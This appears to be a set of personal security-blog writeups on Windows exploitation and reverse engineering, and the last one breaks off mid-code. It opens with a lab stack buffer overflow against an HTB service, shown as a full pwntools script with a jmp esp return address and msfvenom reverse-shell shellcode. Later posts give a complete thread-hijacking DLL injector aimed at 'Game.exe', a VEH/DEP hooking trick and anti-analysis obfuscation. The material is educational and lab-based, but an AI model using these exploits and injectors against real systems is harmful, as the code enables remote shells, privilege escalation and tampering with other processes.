Hijack service via buffer overflow (Windows)

Often times, when we are doing penetration tests, we can encounter some applications that is vulnerable to buffer overflow attack.

What Is a Buffer Overflow Attack? (Excerpt from Fortinet)

A buffer overflow attack takes place when an attacker manipulates the coding error to carry out malicious actions and compromise the affected system. The attacker alters the application’s execution path and overwrites elements of its memory, which amends the program’s execution path to damage existing files or expose data.

A buffer overflow attack typically involves violating programming languages and overwriting the bounds of the buffers they exist on. Most buffer overflows are caused by the combination of manipulating memory and mistaken assumptions around the composition or size of data.

A buffer overflow vulnerability will typically occur when code:

  1. Is reliant on external data to control its behavior
  2. Is dependent on data properties that are enforced beyond its immediate scope
  3. Is so complex that programmers are not able to predict its behavior accurately

To read more: https://www.fortinet.com/resources/cyberglossary/buffer-overflow

Demonstration

Pre-requisites and briefing

We found an interesting service (server.exe is made by HTB, no copyright infringement) running as high privilege. We are currently at a low privilege user, finding a way to escalate our privilege and that service might be our ticket to gain high privilege.

We found out that the service is binding to port 4444.
We exfiltrate the service binary so we can do further analysis.
And it turns out we can extract the username and password of it.
But after logging in, nothing interesting happens.

server.exe – port 4444
$ strings server.exe

Output:
...
Dante Server 1.0
Enter Access Name: 
Admin
Access Password: 
Wrong username!
P@$$worD
Correct Password!
Wrong password!
...
Password found but nothing interesting follows

Further investigation, we found out that the DEP on the target machine was turned off.
We also check the binary for dynamic base / ASLR / relocations and such.
Seems like the binary is simply static therefore the base doesn’t change.

We then proceed to replicate the environment to our lab and do our analysis.

Additional checks

Finding the payload offset

We need to determine the correct padding before the EIP is replaced.
If we can control the EIP, then we can control the execution flow of the program and we can hijack it.

Generate a payload

Send this payload on password field. And we need to check the debugger for exceptions that this payload will create.

payload sent
EIP at 33694232
offset at 1028
from pwn import *  
import sys  
  
if len(sys.argv) < 3:  
        print("Usage: {} ip port".format(sys.argv[0]))  
        sys.exit()  
  
ip = sys.argv[1]  
port = sys.argv[2]  
  
payload = "A" * 1028 + "B" * 4 + "C" * 500  
  
r = remote(ip, port)  
r.recvuntil(':')  
r.sendline("Admin")  
r.recvuntil(':')  
r.sendline(payload)

We can try to run this code so we can check if we got our offsets right.

offsets are just in place!

So we can now take control of EIP and hijack the execution flow.
Since we also control the ESP, we can find an instruction that can make the execution to jump to ESP.

jmp esp

We can use https://defuse.ca/online-x86-assembler.htm to assemble and disassemble opcodes

FF E4

We could use the first result at 0x10476D73

0x10476D73

Generating the reverse shell payload

msfvenom reverse shell

We add the payload to our script.
Here is the updated script:

from pwn import *  
import sys  
  
if len(sys.argv) < 3:  
        print("Usage: {} ip port".format(sys.argv[0]))  
        sys.exit()  
  
ip = sys.argv[1]  
port = sys.argv[2]  


#padding before the EIP Replace
buf =  b"A" * 1028

#jmp esp // 0x10476D73
buf += b"\x73\x6d\x47\x10"

#just a NOP buffer before the actual payload
buf += b"\x90" * 10

#this is where esp is pointed, so the instruction will jump here
buf += b""
buf += b"\xb8\xc6\xe1\x27\x01\xdb\xdd\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc\x03\x80"
buf += b"\xef\xc5\xf4\xf0\x18\x8b\xf7\x08\xd9\xec\x7e\xed"
buf += b"\xe8\x2c\xe4\x66\x5a\x9d\x6e\x2a\x57\x56\x22\xde"
buf += b"\xec\x1a\xeb\xd1\x45\x90\xcd\xdc\x56\x89\x2e\x7f"
buf += b"\xd5\xd0\x62\x5f\xe4\x1a\x77\x9e\x21\x46\x7a\xf2"
buf += b"\xfa\x0c\x29\xe2\x8f\x59\xf2\x89\xdc\x4c\x72\x6e"
buf += b"\x94\x6f\x53\x21\xae\x29\x73\xc0\x63\x42\x3a\xda"
buf += b"\x60\x6f\xf4\x51\x52\x1b\x07\xb3\xaa\xe4\xa4\xfa"
buf += b"\x02\x17\xb4\x3b\xa4\xc8\xc3\x35\xd6\x75\xd4\x82"
buf += b"\xa4\xa1\x51\x10\x0e\x21\xc1\xfc\xae\xe6\x94\x77"
buf += b"\xbc\x43\xd2\xdf\xa1\x52\x37\x54\xdd\xdf\xb6\xba"
buf += b"\x57\x9b\x9c\x1e\x33\x7f\xbc\x07\x99\x2e\xc1\x57"
buf += b"\x42\x8e\x67\x1c\x6f\xdb\x15\x7f\xf8\x28\x14\x7f"
buf += b"\xf8\x26\x2f\x0c\xca\xe9\x9b\x9a\x66\x61\x02\x5d"
buf += b"\x88\x58\xf2\xf1\x77\x63\x03\xd8\xb3\x37\x53\x72"
buf += b"\x15\x38\x38\x82\x9a\xed\xef\xd2\x34\x5e\x50\x82"
buf += b"\xf4\x0e\x38\xc8\xfa\x71\x58\xf3\xd0\x19\xf3\x0e"
buf += b"\xb3\x5a\x04\x10\x42\xcd\x06\x10\x55\x52\x8e\xf6"
buf += b"\x3f\x7c\xc6\xa1\xd7\xe5\x43\x39\x49\xe9\x59\x44"
buf += b"\x49\x61\x6e\xb9\x04\x82\x1b\xa9\xf1\x62\x56\x93"
buf += b"\x54\x7c\x4c\xbb\x3b\xef\x0b\x3b\x35\x0c\x84\x6c"
buf += b"\x12\xe2\xdd\xf8\x8e\x5d\x74\x1e\x53\x3b\xbf\x9a"
buf += b"\x88\xf8\x3e\x23\x5c\x44\x65\x33\x98\x45\x21\x67"
buf += b"\x74\x10\xff\xd1\x32\xca\xb1\x8b\xec\xa1\x1b\x5b"
buf += b"\x68\x8a\x9b\x1d\x75\xc7\x6d\xc1\xc4\xbe\x2b\xfe"
buf += b"\xe9\x56\xbc\x87\x17\xc7\x43\x52\x9c\xf7\x09\xfe"
buf += b"\xb5\x9f\xd7\x6b\x84\xfd\xe7\x46\xcb\xfb\x6b\x62"
buf += b"\xb4\xff\x74\x07\xb1\x44\x33\xf4\xcb\xd5\xd6\xfa"
buf += b"\x78\xd5\xf2"
  
payload = buf
  
r = remote(ip, port)  
r.recvuntil(':')  
r.sendline("Admin")  
r.recvuntil(':')  
r.sendline(payload)

We then need to start our reverse shell listener

And execute the payload!

payload sent!
HIJACKED

Conclusion and Outro

To summarize what we did, here are the steps:

  1. We find the correct padding for our payload to replace the EIP with our desired address
  2. Since we can replace the EIP, we can hijack the execution flow.
  3. We also have control over the ESP, therefore we can command the EIP to jump to ESP
  4. We generate our reverse shell via msfvenom and add it to our payload
  5. HIJACKED!

Okay, its been quite a while before I was able to publish new content.
I was so busy with OSCP, and the thing is, I did my exam.
… and I failed! LOL.
Well, I thought I was ready, but it seems like I still need more practice.
I will be taking 2nd attempt soon. But for now, ill practice more and more.

That’s it! thanks for reading!

Obfuscation thru Polymorphism and Instantiation

The goal of this writeup is to create an additional layer of defense versus analysis.
A lot of malwares utilize this technique in order for the binary analysis make more harder.

Polymorphism is an important concept of object-oriented programming. It simply means more than one form. That is, the same entity (function or operator) behaves differently in different scenarios

www.programiz.com

We can implement polymorphism in C++ using the following ways:

  1. Function overloading
  2. Operator overloading
  3. Function overriding
  4. Virtual functions

Now, let’s get it working. For this article, we are using a basic class named HEAVENSGATE_BASE and HEAVENSGATE.

Fig1: Instantiation

Then we will be calling a function on an Instantiated Object.

Fig2: Call to a function

Normal Declarations

Fig3: We have a pointer named HEAVENSGATE_INSTANCE.

When we examine the function call (Fig2) under IDA, we get the result of:

Fig4: Direct Call to HEAVENSGATE::InitHeavensGate

and when we cross-reference the functions, we will see on screen:

Fig5: xref HEAVENSGATE::InitHeavensGate

The xref on the .rdata is a call from VirtualTable of the Instantiated object. And the xref on the InitThread is a call to the function (Fig2).

Basic Obfuscation

So, how do we apply basic obfuscation?

We just need to change the declaration of Object to be the “_BASE” level.

Fig6: A pointer named HEAVENSGATE_INSTANCE pointer to HEAVENSGATE_BASE

Unlike earlier, the pointer points to a class named HEAVENSGATE. But this time we will be using the “_BASE”.

Under the IDA, we can see the following instructions:

Fig7: Obfuscated call

Well, technically, it isn’t obfuscated. But the thing is, when an analyzer doesn’t have the .pdb file which contains the symbols name, then it will be harder to follow the calls and purpose of a certain call without using debugger.

This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations of function, the compiler moves the address of the object in to the EDX register. This is then dereferenced to get the base of the VMT and stored in the EAX register. The appropriate VMT entry for the function is found by using EAX as an index and storing the address in EDX. This function is then called. Since HEAVENSGATE_BASE and HEAVENSGATE have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it’s done under the hood also allows us to easily write a function to print the VMT.

Fig8: Direct function call is now gone

We can now just see that the direct call (in comparison with Fig5) is now gone. Traces and footprints will be harder to be traced.

Conclusion

Dividing the classes into two: a Base and the Original class, is a time consuming task. It also make the code looks ugly. But somehow, it can greatly add protection to our binary from analysis.

Win11 22H2: Heaven’s Gate Hook

This won’t get too long. Just a quick fix for heavens gate hook (https://mark.rxmsolutions.com/through-the-heavens-gate/) as Microsoft updates the wow64cpu.dll that manages the translation from 32bit to 64bit syscalls of WoW64 applications.

To better visualize the change, here is the comparison of before and after.

Prior to 22h2, down until win10.
win11 22h2

With that being said, you cannot place a hook on 0x3010 as it would take a size of 8 bytes replacement. And would destroy the call mechanism even if you fix the displacement of call.

The solution

The solution is pretty simple. As in very very simple. Copy all the bytes from 0x3010 down until 0x302D. Fix the displacement only for the copied jmp at 0x3028. Then place the hook at 0x3010.
Basically, the copied gate (via VirtualAlloc or Codecave) will continue execution from original 0x3010. And so, the original 0x3015 and onwards will not be executed ever again.

Pretty easy right?

Notes

In the past, Microsoft tends to use far jump to set the CS:33. CS:33 signify that the execution will be a long 64 bit mode in order to translate from 32bit to 64bit. Now, they managed to create bridge without the need for far jmp. Lot of readings need to be cited in order to understand these new mechanism but please do let me know!

Abusing Windows Data Executing Privacy (DEP)

Data Execution Prevention (DEP) is a system-level memory protection feature that is built into the operating system starting with Windows XP and Windows Server 2003. DEP enables the system to mark one or more pages of memory as non-executable. Marking memory regions as non-executable means that code cannot be run from that region of memory, which makes it harder for the exploitation of buffer overruns.

DEP prevents code from being run from data pages such as the default heap, stacks, and memory pools. If an application attempts to run code from a data page that is protected, a memory access violation exception occurs, and if the exception is not handled, the calling process is terminated.

DEP is not intended to be a comprehensive defense against all exploits; it is intended to be another tool that you can use to secure your application.

https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention

How Data Execution Prevention Works

If an application attempts to run code from a protected page, the application receives an exception with the status code STATUS_ACCESS_VIOLATION. If your application must run code from a memory page, it must allocate and set the proper virtual memory protection attributes. The allocated memory must be marked PAGE_EXECUTEPAGE_EXECUTE_READPAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY when allocating memory. Heap allocations made by calling the malloc and HeapAlloc functions are non-executable.

Applications cannot run code from the default process heap or the stack.

DEP is configured at system boot according to the no-execute page protection policy setting in the boot configuration data. An application can get the current policy setting by calling the GetSystemDEPPolicy function. Depending on the policy setting, an application can change the DEP setting for the current process by calling the SetProcessDEPPolicy function.

https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-exception_record

EXCEPTION_RECORD

typedef struct _EXCEPTION_RECORD {
  DWORD                    ExceptionCode;
  DWORD                    ExceptionFlags;
  struct _EXCEPTION_RECORD *ExceptionRecord;
  PVOID                    ExceptionAddress;
  DWORD                    NumberParameters;
  ULONG_PTR                ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;

ExceptionInformation

An array of additional arguments that describe the exception. The RaiseException function can specify this array of arguments. For most exception codes, the array elements are undefined. The following table describes the exception codes whose array elements are defined.

Exception codeMeaning
EXCEPTION_ACCESS_VIOLATIONThe first element of the array contains a read-write flag that indicates the type of operation that caused the access violation. If this value is zero, the thread attempted to read the inaccessible data. If this value is 1, the thread attempted to write to an inaccessible address.If this value is 8, the thread causes a user-mode data execution prevention (DEP) violation.
The second array element specifies the virtual address of the inaccessible data.
EXCEPTION_IN_PAGE_ERRORThe first element of the array contains a read-write flag that indicates the type of operation that caused the access violation. If this value is zero, the thread attempted to read the inaccessible data. If this value is 1, the thread attempted to write to an inaccessible address.If this value is 8, the thread causes a user-mode data execution prevention (DEP) violation.
The second array element specifies the virtual address of the inaccessible data.
The third array element specifies the underlying NTSTATUS code that resulted in the exception.
ExceptionInformation table

The abuse!

VirtualProtect(&addr, &size, PAGE_READONLY, &hs.addressToHookOldProtect);

Set the target address into PAGE_READONLY so that if the address tries to execute/write, then it would result to an exception where we can catch the exception using VEH handler.

LONG WINAPI UltimateHooks::LeoHandler(EXCEPTION_POINTERS* pExceptionInfo)
{
	if (pExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION)
	{
		for (HookEntries hs : hookEntries)
		{
			if ((hs.addressToHook == pExceptionInfo->ContextRecord->XIP) &&
				(pExceptionInfo->ExceptionRecord->ExceptionInformation[0] == 8)) {
				//do your dark rituals here
			}
			return EXCEPTION_CONTINUE_EXECUTION;
		}

	}
	return EXCEPTION_CONTINUE_SEARCH;
}

As you can see, you just have to compare the ExceptionInformation[0] if it is 8 to verify if the exception is caused by DEP.

Simple AF!

What can I do with this?

Change the execution flow, modify the stack, modify values, mutate, and anything your imagination can think of! Just use your creativity!

POC

VEH Debugger
VEH Debugger
VEH Debugger via DEP

Conclusion

Thanks for viewing this, I hope you enjoyed this small writeup. Its been a while since I posted writeups, and may post again on some quite time. I am now currently shifting to Linux environment, should you expect that I will be having writeups on Linux, Web, Network, and Pentesting!

I am also planning to get some certifications such as CEH and OSCP, but I am not quite sure yet. But who knows? Ill just update it here whenever I came to a finalization.

Thanks and have a good day!~

DLL Injection via Thread Hijacking

Okay, so here is a small snippet that you can use for injecting a DLL on an application via “Thread Hijacking”. It’s much safer than injecting with common methods such as CreateRemoteThread. This uses GetThreadContext and SetThreadContext to poison the registers to execute our stub that is allocated via VirtualAllocEx which contains a code that will execute LoadLibraryA that will load our DLL. But this snippet alone is not enough to make your dll injection safe, you can do cleaning of your traces upon injection and other methods. Thanks to thelastpenguin for this awesome base.

FULL CODE

#include <fstream>
#include <iostream>
#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h>
#include <direct.h> // _getcwd
#include <string>
#include <iomanip>
#include <sstream>
#include <process.h>

#include <unordered_set>

#include "makesyscall.h"
#pragma comment(lib,"ntdll.lib")



using namespace std;

DWORD FindProcessId(const std::wstring&);
long InjectProcess(DWORD, const char*);

void dotdotdot(int count, int delay = 250);
void cls();

int main_scanner();
int main_injector();

string GetExeFileName();
string GetExePath();

BOOL IsAppRunningAsAdminMode();
void ElevateApplication();

__declspec(naked) void stub()
{
	__asm
	{
		// Save registers

		pushad
			pushfd
			call start // Get the delta offset

		start :
		pop ecx
			sub ecx, 7

			lea eax, [ecx + 32] // 32 = Code length + 11 int3 + 1
			push eax
			call dword ptr[ecx - 4] // LoadLibraryA address is stored before the shellcode

			// Restore registers

			popfd
			popad
			ret

			// 11 int3 instructions here
	}
}

// this way we can difference the addresses of the instructions in memory
DWORD WINAPI stub_end()
{
	return 0;
}
//

int main(int argc, char* argv) {
	main_injector();
	main_scanner();
}

BOOL IsAppRunningAsAdminMode()
{
	BOOL fIsRunAsAdmin = FALSE;
	DWORD dwError = ERROR_SUCCESS;
	PSID pAdministratorsGroup = NULL;

	// Allocate and initialize a SID of the administrators group.
	SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
	if (!AllocateAndInitializeSid(
		&NtAuthority,
		2,
		SECURITY_BUILTIN_DOMAIN_RID,
		DOMAIN_ALIAS_RID_ADMINS,
		0, 0, 0, 0, 0, 0,
		&pAdministratorsGroup))
	{
		dwError = GetLastError();
		goto Cleanup;
	}

	// Determine whether the SID of administrators group is enabled in 
	// the primary access token of the process.
	if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
	{
		dwError = GetLastError();
		goto Cleanup;
	}

Cleanup:
	// Centralized cleanup for all allocated resources.
	if (pAdministratorsGroup)
	{
		FreeSid(pAdministratorsGroup);
		pAdministratorsGroup = NULL;
	}

	// Throw the error if something failed in the function.
	if (ERROR_SUCCESS != dwError)
	{
		throw dwError;
	}

	return fIsRunAsAdmin;
}
// 

void ElevateApplication(){
	wchar_t szPath[MAX_PATH];
	if (GetModuleFileName(NULL, szPath, ARRAYSIZE(szPath)))
	{
		// Launch itself as admin
		SHELLEXECUTEINFO sei = { sizeof(sei) };
		sei.lpVerb = L"runas";
		sei.lpFile = szPath;
		sei.hwnd = NULL;
		sei.nShow = SW_NORMAL;
		if (!ShellExecuteEx(&sei))
		{
			DWORD dwError = GetLastError();
			if (dwError == ERROR_CANCELLED)
			{
				// The user refused to allow privileges elevation.
				std::cout << "User did not allow elevation" << std::endl;
			}
		}
		else
		{
			_exit(1);  // Quit itself
		}
	}
}

string GetExeFileName()
{
	char buffer[MAX_PATH];
	GetModuleFileNameA(NULL, buffer, MAX_PATH);
	return std::string(buffer);
}

string GetExePath()
{
	std::string f = GetExeFileName();
	return f.substr(0, f.find_last_of("\\/"));
}

int main_scanner() {
	std::cout << "Loading";
	dotdotdot(4);
	std::cout << endl;

	cls();

	string processName = "Game.exe";
	string payloadPath = GetExePath() + "\\" + "hack.dll";

	cls();
	std::cout << "\tProcess Name: " << processName << endl;
	std::cout << "\tRelative Path: " << payloadPath << endl;

	std::wstring fatProcessName(processName.begin(), processName.end());
	
	std::unordered_set<DWORD> injectedProcesses;


	while (true) {
		std::cout << "Scanning";
		while (true) {
			dotdotdot(4);

			DWORD processId = FindProcessId(fatProcessName);
			if (processId && injectedProcesses.find(processId) == injectedProcesses.end()) {
				std::cout << "\n====================\n";
				std::cout << "Found a process to inject!" << endl;
				std::cout << "Process ID: " << processId << endl;
				std::cout << "Injecting Process: " << endl;

				if (InjectProcess(processId, payloadPath.c_str()) == 0) {
					std::cout << "Success!" << endl;
					injectedProcesses.insert(processId);
				}
				else {
					std::cout << "Error!" << endl;
				}
				std::cout << "====================\n";
				break;
			}
		}
	}
}

int main_injector() {
	cls();

	if (IsAppRunningAsAdminMode())
		return 1;
	else
		ElevateApplication();
}

void dotdotdot(int count, int delay) {
	int width = count;
	for (int dots = 0; dots <= count; ++dots) {
		std::cout << std::left << std::setw(width) << std::string(dots, '.');
		Sleep(delay);
		std::cout << std::string(width, '\b');
	}
}

void cls() {
	std::system("cls");
	std::cout <<
		" -------------------------------\n"
		"  Thread Hijacking Injector \n"

		" -------------------------------\n";
}

DWORD FindProcessId(const std::wstring& processName) {
	PROCESSENTRY32 processInfo;
	processInfo.dwSize = sizeof(processInfo);

	HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
	if (processesSnapshot == INVALID_HANDLE_VALUE)
		return 0;

	Process32First(processesSnapshot, &processInfo);
	if (!processName.compare(processInfo.szExeFile))
	{
		CloseHandle(processesSnapshot);
		return processInfo.th32ProcessID;
	}

	while (Process32Next(processesSnapshot, &processInfo))
	{
		if (!processName.compare(processInfo.szExeFile))
		{
			CloseHandle(processesSnapshot);
			return processInfo.th32ProcessID;
		}
	}

	CloseHandle(processesSnapshot);
	return 0;
}


long InjectProcess(DWORD ProcessId, const char* dllPath) {

	HANDLE hProcess, hThread, hSnap;
	DWORD stublen;
	PVOID LoadLibraryA_Addr, mem;

	THREADENTRY32 te32;
	CONTEXT ctx;

	// determine the size of the stub that we will insert
	stublen = (DWORD)stub_end - (DWORD)stub;
	cout << "Calculated the stub size to be: " << stublen << endl;


	// opening target process
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);

	if (!hProcess) {
		cout << "Failed to load hProcess with id " << ProcessId << endl;
		Sleep(10000);
		return 0;
	}

	// todo: identify purpose of this code
	te32.dwSize = sizeof(te32);
	hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);


	Thread32First(hSnap, &te32);
	cout << "Identifying a thread to hijack" << endl;
	while (Thread32Next(hSnap, &te32))
	{
		if (te32.th32OwnerProcessID == ProcessId)
		{
			cout << "Target thread found. TID: " << te32.th32ThreadID << endl;

			CloseHandle(hSnap);
			break;
		}
	}

	// opening a handle to the thread that we will be hijacking
	hThread = OpenThread(THREAD_ALL_ACCESS, false, te32.th32ThreadID);
	if (!hThread) {
		cout << "Failed to open a handle to the thread " << te32.th32ThreadID << endl;
		Sleep(10000);
		return 0;
	}

	// now we suspend it.
	ctx.ContextFlags = CONTEXT_FULL;
	SuspendThread(hThread);

	cout << "Getting the thread context" << endl;
	if (!GetThreadContext(hThread, &ctx)) // Get the thread context
	{
		cout << "Unable to get the thread context of the target thread " << GetLastError() << endl;
		ResumeThread(hThread);
		Sleep(10000);
		return -1;
	}

	cout << "Current EIP: " << ctx.Eip << endl;
	cout << "Current ESP: " << ctx.Esp << endl;

	cout << "Allocating memory in target process." << endl;
	mem = VirtualAllocEx(hProcess, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	if (!mem) {
		cout << "Unable to reserve memory in the target process." << endl;
		ResumeThread(hThread);
		Sleep(10000);
		return -1;
	}

	cout << "Memory allocated at " << mem << endl;
	LoadLibraryA_Addr = LoadLibraryA;

	cout << "Writing shell code, LoadLibraryA address, and DLL path into target process" << endl;

	cout << "Writing out path buffer " << dllPath << endl;
	size_t dllPathLen = strlen(dllPath);

	WriteProcessMemory(hProcess, mem, &LoadLibraryA_Addr, sizeof(PVOID), NULL); // Write the address of LoadLibraryA into target process
	WriteProcessMemory(hProcess, (PVOID)((LPBYTE)mem + 4), stub, stublen, NULL); // Write the shellcode into target process
	WriteProcessMemory(hProcess, (PVOID)((LPBYTE)mem + 4 + stublen), dllPath, dllPathLen, NULL); // Write the DLL path into target process

	ctx.Esp -= 4; // Decrement esp to simulate a push instruction. Without this the target process will crash when the shellcode returns!
	WriteProcessMemory(hProcess, (PVOID)ctx.Esp, &ctx.Eip, sizeof(PVOID), NULL); // Write orginal eip into target thread's stack
	ctx.Eip = (DWORD)((LPBYTE)mem + 4); // Set eip to the injected shellcode

	cout << "new eip value: " << ctx.Eip << endl;
	cout << "new esp value: " << ctx.Esp << endl;

	cout << "Setting the thread context " << endl;

	if (!SetThreadContext(hThread, &ctx)) // Hijack the thread
	{
		cout << "Unable to SetThreadContext" << endl;
		VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE);
		ResumeThread(hThread);
		Sleep(10000);
		return -1;
	}

	ResumeThread(hThread);

	cout << "Done." << endl;

	return 0;
}

PoC

Thread Hijacking PoC

I think that’s all for this writeup. With that being said, this could be my last writeup for now as I am going very very busy for the next couple of months.

Thank you so much, and I hope you enjoyed this writeup!

root@sh3n:~/$ see_ya_again_soon_!

Walking through VEH handlers list

This writeup is just a PoC on getting the handlers list in win10.
This PoC was done in Win10 build 19041.

VEH is used to catch exceptions happening in the application, when the exceptions are caught, you have a chance to resolve the exceptions to avoid application crash.

Credits

Almost this whole writeup is written by Dimitri Fourny and not my original writeup but some parts of it are modified as per my Win10 build version. Please kindly visit his blog to see the original writeup.

VEH usage example

LONG NTAPI MyVEHHandler(PEXCEPTION_POINTERS ExceptionInfo) {
  printf("MyVEHHandler (0x%x)\n", ExceptionInfo->ExceptionRecord->ExceptionCode);

  if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_INT_DIVIDE_BY_ZERO) {
    printf("  Divide by zero at 0x%p\n", ExceptionInfo->ExceptionRecord->ExceptionAddress);
    ExceptionInfo->ContextRecord->Eip += 2;
    return EXCEPTION_CONTINUE_EXECUTION;
  }

  return EXCEPTION_CONTINUE_SEARCH;
}

int main() {
  AddVectoredExceptionHandler(1, MyVEHHandler);
  int except = 5;
  except /= 0;
  return 0;
}

There are also applications that uses this method to other matters, such as Cheat Engine to bypass basic debugger checks.

Cheat Engine VEH Debugger

Exception Path

When a CPU exception occurs, the kernel will call the function KiDispatchException (ring0) which will follow this exception to the ntdll method KiUserExceptionDispatcher (ring3). This function will call RtlDispatchException which will try to handle it via the VEH. To do it, it will read the VEH chained list via RtlCallVectoredHandlers and calling each handlers until one return EXCEPTION_CONTINUE_EXECUTION. If a handler returned EXCEPTION_CONTINUE_EXECUTION, the function RtlCallVectoredContinueHandlers is called and it will call all the continue exception handlers.

Exception Path

The VEH handlers are important because the SEH handlers are called only if no VEH handler has caught the exception, so it could be the best method to catch all exceptions if you don’t want to hook KiUserExceptionDispatcher. If you want more information about the exceptions dispatcher, 0vercl0ck has made a good paper about it.

The chained list

The VEH list is a circular linked list with the handlers functions pointers encoded:

Chained List

The exception handlers are encoded with a process cookie but you can decode them easily. If you are dumping the VEH which is inside your own process, you can just use DecodePointer and you don’t have to care about the process cookie. If it’s a remote process you can use DecodeRemotePointer but you will need to create your own function pointer with GetModuleHandle("kernel32.dll") and GetProcAddress("DecodeRemotePointer").

The solution that I have chosen is to imitate DecodePointer by getting the process cookie with ZwQueryProcessInformation and applying the same algorithm:

RtlDecodePointer
DWORD Process::GetProcessCookie() const {
  DWORD cookie = 0;
  DWORD return_length = 0;

  HMODULE ntdll = GetModuleHandleA("ntdll.dll");
  _NtQueryInformationProcess NtQueryInformationProcess =
      reinterpret_cast<_NtQueryInformationProcess>(
          GetProcAddress(ntdll, "NtQueryInformationProcess"));

  NTSTATUS success = NtQueryInformationProcess(
      process_handle_, ProcessCookie, &cookie, sizeof(cookie), &return_length);
  if (success < 0) {
    return 0;
  }
  return cookie;
}

#define ROR(x, y) ((unsigned)(x) >> (y) | (unsigned)(x) << 32 - (y))
DWORD Process::DecodePointer(DWORD pointer) {
  if (!process_cookie_) {
    process_cookie_ = GetProcessCookie();
    if (!process_cookie_) {
      return 0;
    }
  }

  unsigned char shift_size = 0x20 - (process_cookie_ & 0x1f);
  return ROR(pointer, shift_size) ^ process_cookie_;
}

Finding the VEH list offset

Even if you can find the symbol LdrpVectorHandlerList in the ntdll pdb, there is no official API to get it easily. My solution is to begin by getting a pointer to RtlpAddVectoredHandler:

RtlAddVectoredExceptionHandler

You can disassemble the method RtlAddVectoredExceptionHandler until you find the instruction call or you can just pretend that its address is always at 0x16 bytes after it:

BYTE* add_exception_handler = reinterpret_cast<BYTE*>(
    GetProcAddress(ntdll, "RtlAddVectoredExceptionHandler"));
BYTE* add_exception_handler_sub =
    add_exception_handler + 0x16;  // RtlpAddVectoredHandler

And from here the same byte offset method could work, but a simple signature system could prevent us to be broken after a small Windows update:

_LdrpVectorHandlerList
const BYTE pattern_list[] = {
    0x89, 0x46, 0x10,          // mov [esi+10h], eax
    0x81, 0xc3, 0, 0, 0, 0  // add ebx, offset LdrpVectorHandlerList
};
const char mask_list[] = "xxxxx????";
BYTE* match_list =
    SearchPattern(add_exception_handler_sub, 0x100, pattern_list, mask_list);
BYTE* veh_list = *reinterpret_cast<BYTE**>(match_list + 5);
size_t veh_list_offset = veh_list - reinterpret_cast<BYTE*>(ntdll);
printf("LdrpVectorHandlerList: 0x%p (ntdll+0x%x)\n", veh_list, veh_list_offset);

Final code

#define ROR(x, y) ((unsigned)(x) >> (y) | (unsigned)(x) << 32 - (y))

DWORD Process::GetProcessCookie() const {
  DWORD cookie = 0;
  DWORD return_length = 0;

  HMODULE ntdll = GetModuleHandleA("ntdll.dll");
  _NtQueryInformationProcess NtQueryInformationProcess =
      reinterpret_cast<_NtQueryInformationProcess>(
          GetProcAddress(ntdll, "NtQueryInformationProcess"));

  NTSTATUS success = NtQueryInformationProcess(
      process_handle_, ProcessCookie, &cookie, sizeof(cookie), &return_length);
  if (success < 0) {
    return 0;
  }
  return cookie;
}

DWORD Process::DecodePointer(DWORD pointer) {
  if (!process_cookie_) {
    process_cookie_ = GetProcessCookie();
    if (!process_cookie_) {
      return 0;
    }
  }

  unsigned char shift_size = 0x20 - (process_cookie_ & 0x1f);
  return ROR(pointer, shift_size) ^ process_cookie_;
}

typedef struct _VECTORED_HANDLER_ENTRY {
  _VECTORED_HANDLER_ENTRY* next;
  _VECTORED_HANDLER_ENTRY* previous;
  ULONG refs;
  PVECTORED_EXCEPTION_HANDLER handler;
} VECTORED_HANDLER_ENTRY;

typedef struct _VECTORED_HANDLER_LIST {
  void* mutex_exception;
  VECTORED_HANDLER_ENTRY* first_exception_handler;
  VECTORED_HANDLER_ENTRY* last_exception_handler;
  void* mutex_continue;
  VECTORED_HANDLER_ENTRY* first_continue_handler;
  VECTORED_HANDLER_ENTRY* last_continue_handler;
} VECTORED_HANDLER_LIST;

DWORD GetVEHOffset() {
  HMODULE ntdll = LoadLibraryA("ntdll.dll");
  printf("ntdll: 0x%p\n", ntdll);
  perror_if_invalid(ntdll, "LoadLibrary");

  BYTE* add_exception_handler = reinterpret_cast<BYTE*>(
      GetProcAddress(ntdll, "RtlAddVectoredExceptionHandler"));
  printf("RtlAddVectoredExceptionHandler: 0x%p\n", add_exception_handler);
  perror_if_invalid(add_exception_handler, "GetProcAddress");

  BYTE* add_exception_handler_sub = add_exception_handler + 0x16;
  printf("RtlpAddVectoredExceptionHandler: 0x%p\n", add_exception_handler_sub);

  const BYTE pattern_list[] = {
      0x89, 0x46, 0x10,          // mov [esi+10h], eax
      0x81, 0xc3, 0,    0, 0, 0  // add ebx, offset LdrpVectorHandlerList
  };
  const char mask_list[] = "xxxxx????";
  BYTE* match_list =
      SearchPattern(add_exception_handler_sub, 0x100, pattern_list, mask_list);
  perror_if_invalid(match_list, "SearchPattern");
  BYTE* veh_list = *reinterpret_cast<BYTE**>(match_list + 5);
  size_t veh_list_offset = veh_list - reinterpret_cast<BYTE*>(ntdll);
  printf("LdrpVectorHandlerList: 0x%p (ntdll+0x%x)\n", veh_list,
         veh_list_offset);

  return veh_list_offset;
}

int main() {
  auto process = Process::GetProcessByName(L"veh_dumper.exe");
  perror_if_invalid(process.get(), "GetProcessByName");
  printf("Process cookie: 0x%0x\n", process->GetProcessCookie());

  DWORD ntdll = process->GetModuleBase(L"ntdll.dll");
